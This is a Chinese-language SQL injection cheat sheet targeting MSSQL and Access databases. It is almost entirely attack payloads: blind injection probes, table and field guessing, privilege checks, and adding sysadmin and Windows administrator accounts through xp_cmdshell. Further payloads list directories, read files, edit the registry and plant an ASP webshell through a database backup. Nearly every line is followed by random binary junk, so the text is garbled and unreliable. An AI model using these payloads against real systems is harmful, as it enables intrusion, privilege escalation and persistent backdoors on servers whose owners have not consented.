1.判断是否有注入;and 1=1 ;and 1=2 c<�/d1x�T�
2.初步判断是否是mssql ;and user>0 �{%'(IJ|5z
�Mje�6�Q��
3.注入参数是字符'and [查询条件] and ''=' d3+pS\&IX?
xpKD 'O=T
4.搜索时没过滤参数的'and [查询条件] and '%25'=' lq�}=�&)%C
+i�i�r�]"8
5.判断数据库系统 !,+p��eMy
5v=�%pQ�bY
;and (select count(*) from sysobjects)>0 mssql @��O�5-��w
`�ux
U
H#�
;and (select count(*) from msysobjects)>0 access D:U�:(� pg
��4�T`u?T]
�}>�=k!�l{
3�20�5gI,�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 K~5�Q�L/=1
p}hOkx4R\�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �@>_`g��=�
� Y5�$5qQ�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 81fpe�o�NO
G���%����
9.(1)猜字段的ascii值(access) E�n&�ESW�N
�Pq>r|/~�_
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 B t-�o:)pa
��AKC�';J
(2)猜字段的ascii值(mssql) r;t�0+aLc*
�.vj�`[�?T
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �E9;c�d$}K
p�[VBeO^%�
10.测试权限结构(mssql) ��6n]�fr9f
v9(�->��X'
4*g`!���~)
H2l�/9�+��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��~z$�v��F
rJ4��O_a5/
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Ig�t:M[�
/
������fD�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- YQv��N;�W
$*V:�;��-H
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- <���->Nex
~&4Hc%*I�B
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- k]!Fh^�O~,
r9sW:cM:e�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �)d!,�,��o
�6e(|t2�^�
;and 1=(select IS_MEMBER('db_owner'));-- �w?�d~c*4+
nPj%EKdY�4
�8�Gzc��3
hn��#i,XnY
11.添加mssql和系统的帐户 ya0L8��`�q
!��jL|HwlA
;exec master.dbo.sp_addlogin username;-- UB��� }n�=
;exec master.dbo.sp_password null,username,password;-- v=E�V5#�A�
0��'wB':v
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ��qv�y�~b�
Ci0:�-�IS�
;exec master.dbo.xp_cmdshell 'net user username password U�+F?�b��\
�dE��lOy?v
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- -@X?~4Id�z
o_p#s�dt�"
;exec master.dbo.xp_cmdshell 'net user username password /add';-- @c�A`del��
oA%8k51>~K
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��+!6aB�|-
"rOe J~4 X
$@"�o �BCc
yT%"<m6Y*\
12.(1)遍历目录 >!MOg�L�O3
��^E*�W
B~
;create table dirs(paths varchar(100), id int) s�y=M#WGS�
%�Sr/'7 �K
;insert dirs exec master.dbo.xp_dirtree 'c:\' f^z~{|%l!�
wWv")dk3�i
;and (select top 1 paths from dirs)>0
�I&?(=i)N
"Kx2k�>ym�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) U~n>k<�`sr
����Veo:G{
�(x�f��_��
5@ecZ2`)+h
(2)遍历目录 1�9X�c0ez�
��m=<Ty�lv
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �u[�q1]]��
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ��j�}�7as&
��j/`-��x�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �e>vV8��a\
�FtXd6)_�S
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 }CnqJ@>C5�
R����("g ]
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 2�A7g}V��
qq"�&Bc>��
6FNs4|(�d�
++�d(}�^C;
13.mssql中的存储过程 �x�db9o�H�
wNMg�Y����
xp_regenumvalues 注册表根键, 子键 1t� �haQ"
np,L�39:sf
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 qR^KvAEQSo
\g<����9_�
xp_regread 根键,子键,键值名 1ThON�rxu�
G�xE"q-G�
;exec xp_regread �)nmL�gs�g
):OGhW��q�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 NSH20$��A<
��}_93}e�
xp_regwrite 根键,子键, 值名, 值类型, 值 B�?�`n�@�/
rq�bX9M��^
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �q�plz !=�
N=�FU>qb�z
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 p?(w���!�O
l*_%K}%�?V
xp_regdeletevalue 根键,子键,值名 �y�^��7;I-
t)P5bQ+$u9
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 7Gb����1[3
�
SbQ� �Ri
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 k~f3~-���"
/+2;"��.�
u&/[s�q��x
�sk� !92mQ
14.mssql的backup创建webshell v$c*3H.seM
,C�qJ��((
use model ��qOy3�D~�
^*.S7�.;2o
create table cmd(str image); 9�s\(yC�8h
V��\Oe�]�w
insert into cmd(str) values (''); ^%�l~��|w�
�0!X;C!v�;
backup database model to disk='c:\l.asp'; Y2709LW�mP
i
b�A��Z*I
N�cr38~;w�
^%� y<7�>%
15.mssql内置函数 #eSVFD5�ZU
�q>:��>f+4
;and (select @@version)>0 获得Windows的版本号 7 j$ |�f�S
;�AyE(|U+
;and user_name()='dbo' 判断当前系统的连接用户是不是sa W/_=S+CvK
�lg`� �Qi&
;and (select user_name())>0 爆当前系统的连接用户 >;V ?��s�]
�#�U45H.Rz
;and (select db_name())>0 得到当前连接的数据库 @V{�s'V ��
T�d���tn-
Y@x�� }b{3
�HDqPqrW�m
16.简洁的webshell LDlj4>%pW^
MG ,exN
@�
use model i'�&Ko�R�?
bB��^% O^:
create table cmd(str image); 3 $7TeqfAC
�&"�GHD{ix
insert into cmd(str) values (''); @y:mj \�J9
%-ih$Z��Y�
backup database model to disk='g:\wwwtest\l.asp';
